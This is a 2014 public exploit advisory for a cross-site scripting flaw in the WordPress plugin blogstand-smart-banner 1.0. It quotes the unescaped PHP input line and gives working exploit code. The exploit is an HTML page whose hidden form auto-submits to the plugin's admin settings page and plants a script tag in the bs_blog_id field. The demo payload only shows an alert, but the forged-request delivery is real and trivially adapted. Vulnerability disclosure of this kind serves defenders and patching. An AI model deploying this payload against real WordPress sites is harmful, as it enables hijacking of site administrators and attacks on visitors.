######################
# Exploit Title : Wordpress blogstand-smart-banner.1.0 Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org/plugins/blogstand-smart-banner/
# Software Link : http://downloads.wordpress.org/plugin/blogstand-smart-banner.1.0.zip
# Date : 2014-07-01
# Tested on : Windows 7 / Mozilla Firefox
######################
# Location : http://localhost/wp-admin/options-general.php?page=bs-banner
######################
# Vulnerable code :
<td><input type="text" name="<?php echo $blog_id_field; ?>" value="<?php echo $blog_id; ?>" /></td>
######################
Exploit Code:
<html>
<body>
<form name="form1" method="post" action="http://localhost/wp-admin/options-general.php?page=bs-banner">
<input type="hidden" name="blogstand_hidden" value="SET">
<input type="hidden" name="bs_blog_id" value='"/><script>alert(1);</script>'/>
<script language="Javascript">
setTimeout('form1.submit()', 1);
</script>
</form>
</body>
</html>
#####################